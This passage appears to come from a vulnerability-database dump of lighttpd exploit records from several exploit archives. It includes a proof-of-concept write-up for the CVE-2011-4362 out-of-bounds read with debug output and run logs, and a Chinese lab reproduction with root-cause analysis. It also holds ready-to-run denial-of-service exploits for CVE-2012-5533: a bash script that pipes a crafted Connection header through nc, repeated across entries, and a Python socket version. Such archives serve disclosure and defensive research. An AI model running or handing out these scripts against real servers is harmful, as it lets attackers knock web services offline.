Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. 
| 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... 
OK\r\n\t\t[+] Sending dirty packet... OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n?Yg\\???n?Xt?]rze???gY??\\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp?\t]???\\???@V??x???ize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:34:51", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 66153\r\nCVE(CAN) ID: CVE-2014-2323\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\n\u7531\u4e8e\u7a0b\u5e8f\u5728\u8fdb\u884cSQL\u67e5\u8be2\u524d\u672a\u80fd\u5145\u5206\u8fc7\u6ee4\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5371\u53ca\u5e94\u7528\u7a0b\u5e8f\uff0c\u8bbf\u95ee\u6216\u4fee\u6539\u6570\u636e\uff0c\u6216\u5229\u7528\u5e95\u5c42\u6570\u636e\u5e93\u4e2d\u6f5c\u5728\u7684\u6f0f\u6d1e\u3002\n0\nlighttpd <1.4.35\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\nhttp://www.lighttpd.net", "modified": "2014-03-28T00:00:00", "published": "2014-03-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61980", "id": "SSV:61980", "type": "seebug", "title": "lighttpd 'mod_mysql_vhost.c' SQL\u6ce8\u5165\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": 
"2016-02-02T19:49:08", "bulletinFamily": "exploit", "description": "lighttpd 1.4.31 - Denial of Service PoC. CVE-2012-5533. Dos exploit for linux platform", "modified": "2012-11-22T00:00:00", "published": "2012-11-22T00:00:00", "id": "EDB-ID:22902", "href": "https://www.exploit-db.com/exploits/22902/", "type": "exploitdb", "title": "lighttpd 1.4.31 - Denial of Service PoC", "sourceData": "#!/bin/bash\r\n# Exploit Title: simple lighttpd 1.4.31 DOS POC\r\n# Date: 11/21/2012\r\n# Exploit Author: t4c@ghcif.de\r\n# Vendor Homepage: http://www.lighttpd.net\r\n# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz \r\n# Version: 1.4.31\r\n# Tested on: Debian Linux, Gentoo Linux, Arch Linux\r\n# CVE: CVE-2012-5533\r\n\r\nif [ $# -lt 2 ]\r\nthen\r\n\techo \"usage :$0 <Host/IP> <Port>\"\r\nelse\r\n\techo -ne \"GET / HTTP/1.1\\r\\nHost: pwn.ed\\r\\nConnection: TE,,Keep-Alive\\r\\n\\r\\n\" | nc $1 $2\r\nfi\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22902/"}, {"lastseen": "2016-02-02T09:30:05", "bulletinFamily": "exploit", "description": "lighttpd Denial of Service Vulnerability PoC. CVE-2011-4362. Dos exploit for linux platform", "modified": "2011-12-31T00:00:00", "published": "2011-12-31T00:00:00", "id": "EDB-ID:18295", "href": "https://www.exploit-db.com/exploits/18295/", "type": "exploitdb", "title": "lighttpd Denial of Service Vulnerability PoC", "sourceData": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. 
The vulnerable code is below:\r\n\r\n\r\n\"src/http_auth.c:67\"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. 
| 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. 
| 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... 
OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd\t]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18295/"}], "myhack58": [{"lastseen": "2017-08-23T15:23:25", "bulletinFamily": "info", "description": "A\uff0e lighttpd domain processing denial of service vulnerability of the environment to build \n1 Install lighttpd \nBecause this vulnerability requires that a fixed version,so we need to manually install. \nwget http://download.lighttpd.net/lighttpd/releases-1.4.x/ lighttpd-1.4.31.tar.gz \ntar-zxvf lighttpd-1.4.31.tar.gz \ncd lighttpd-1.4.31 \nTo this step, the next step is to perform \n\n./ configure \nCommand, but in this step may appear the following error: \n\nconfigure: error: pcre-config not found, install the pcre-devel package or bui with --without-pcre \nWe need to perform: \n\nyum install gcc glib2-devel openssl-devel pcre-devel bzip2-devel gzip-devel zlib-devel \nTo update the missing of the associated packet \nAfter installation, continue to perform \n./ configure \nmake && make install \nThe compilation is completed, perform the step two. 
\n2\uff09copy of the lighttpd executable file \nCreate a default file: \nmkdir lighttpd-test \ncd lighttpd-test \nCopy: \n\ncp /usr/local/sbin/lighttpd home/lighttpd-test/ \n3) create the configuration file \n\nvim lighttpd. conf \nWrite: \nserver. document-root=\"/var/www/\" \nserver. port = 8080 \nserver. username = \"www\" \nserver. groupname = \"www\" \nmimetype. assign = ( \n\". html\" => \"text/html\", \n\". txt\" => \"text/plain\", \n\". jpg\" => \"image/jpeg\", \n\". png?www.myhack58.com\" => \"image/png? www. myhack58. com\" \n) \nstatic-file. exclude-extensions = ( \". fcgi\", \". php\", \". rb\", \"~\", \". inc\" ) \nindex-file. names = ( \"index.html\" ) \n4\uff09write their own Welcome page(index.html) \n\nvim /var/www/index.html \nhtml> \nhead>title>Hellotitle>head> \nbody> \nh1>This is a testh1> \nbody> \nhtml> \n5\uff09Turn on the firewall, start the lighttpd service \nOpen the firewall: \n\niptables-I INPUT-p tcp --dport 8080-j ACCEPT \nStart the service: \n\n./ lighttpd-f lighttpd. conf \nNote: to start the service here must be an absolute path, it can also be your own go on to add the following environment variable where path is home/lighttpd-test/ it. \nStart after the display server started. \nNext, you can enter the browser test: \n\nhttp://127.0.0.1:8080 \nOK,after loading it will display a we write your own Welcome page. \n! [](/Article/UploadPic/2017-8/201782318520907. png? www. myhack58. com) \n\nII. lighttpd denial of service vulnerability principle and reproduce \n1\uff09principles:vulnerability Description: The CVE(CAN) ID: CVE-2012-5533 \nlighttpd is an open source lightweight[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm> a). \nlighttpd 1.4.31 in the processing of certain HTTP request headers,\"http_request_split_value()\"function(src/request. c)in processing a specially crafted\"Connection\"header field will fall into an infinite loop. 
An attacker exploiting this vulnerability can lead to Lighttpd denial of service. \n2. the vulnerability reproduction \nVulnerability script: https://www.exploit-db.com/exploits/22902/ \nThis script is a bash script, need to change the following permissions: \nIn the script directory execute the command: \n\nchmod +x test.sh \nThen execute: \n\n./ test.sh \nGood, the execution is successful. \nThe included python script: \n#encoding: utf-8 \nimport socket \nif __name__ == '__main__': \nsock=socket. socket(socket. AF_INET, socket. SOCK_STREAM) \nsock. connect(('192.**.**.**', 8080)) \nsock. send(b'GET/HTTP/1.1\\r\\nHost: pwn. ed\\r\\nConnection: TE,,Keep-Alive\\r\\n\\r\\n') \nsock. close() \nprint('ok') \nNotes: \nCommand: \n\nps aux | grep \"light*\" \nView the lighttpd service of process information. \n\ntop \nView the Task Manager \n\nkill -9 PID \nTo kill a process \nThird, the dynamic and static combination of tracking vulnerability presented reasons \nEarlier we known to cause vulnerability function is(src/request. c)inside the\"http_request_split_value()\"function, so we first find this function position, where I direct this function to cut out: \n! [](/Article/UploadPic/2017-8/201782318520721. png? www. myhack58. com) \nLet's take a closer look at the marked red the code, start entering the function b there is certainly value, it will enter the for Loop, the first state is 0, it will go into case 0, however, we look carefully, in fact case 0 inside the for loop is not being executed. Therefore, in case 0, the direct state=1;break;jump out of the switch..case. To continue the for Loop, then state=1,it proceeds to case 1, start=s,then, for the function condition is not equal to\u2018, and\u2019, the i++, and then enters the if statement, The if statement condition is start=s, executing the break,therefore, continue for loop, state=1, into the case 1. 
\nSomeone said, even if for loop, also end of time Ah, then we look carefully under the first for loop, which i value, in fact, is according to the exploit the script to send data and determination of the vulnerability of the script inside\u2018,\u2019in front of only two bytes, so when equal to\u2018that\u2019when there is no change, therefore, resulting in a dead loop. \nThen, next, using the gdb Debugger live debugging to verify it, is not, as we said above. \nRunning the exploit script, use the command \n\ngdb-p \nInto gdb \nDebugging status: \n\n! [](/Article/UploadPic/2017-8/201782318520410. png? www. myhack58. com)\n\n**[1] [[2]](<88804_2.htm>) [next](<88804_2.htm>)**\n", "modified": "2017-08-23T00:00:00", "published": "2017-08-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88804.htm", "id": "MYHACK58:62201788804", "title": "lighttpd domain processing denial of service vulnerability environment from the reproduction to the analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:36", "bulletinFamily": "exploit", "description": "", "modified": "2012-11-22T00:00:00", "published": "2012-11-22T00:00:00", "href": "https://packetstormsecurity.com/files/118282/Simple-Lighttpd-1.4.31-Denial-Of-Service.html", "id": "PACKETSTORM:118282", "type": "packetstorm", "title": "Simple Lighttpd 1.4.31 Denial Of Service", "sourceData": "`#!/bin/bash \n# simple lighttpd 1.4.31 DOS POC \n# CVE-2012-5533 \n# http://www.lighttpd.net/2012/11/21/1-4-32/ \n# http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt \n# written by Milan Berger <t4c@ghcif.de> \n \nif [ $# -lt 2 ] \nthen \necho \"usage :$0 <Host/IP> <Port>\" \nelse \necho -ne \"GET / HTTP/1.1\\r\\nHost: pwn.ed\\r\\nConnection: \nTE,,Keep-Alive\\r\\n\\r\\n\" | nc $1 $2 \nfi \n \n`\n", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/118282/simplelighttpd-dos.txt"}], "zdt": [{"lastseen": "2018-01-03T13:04:46", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2011-12-31T00:00:00", "published": "2011-12-31T00:00:00", "id": "1337DAY-ID-17319", "href": "https://0day.today/exploit/description/17319", "type": "zdt", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "sourceData": "/*\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, 
-1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * \t...\r\n * \tint ch, ...;\r\n * \tsize_t i;\r\n * \t...\r\n * \t\r\n * \t\tch = in[i];\r\n * \t\t...\r\n * \t\tch = base64_reverse_table[ch];\r\n * \t...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. 
| 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 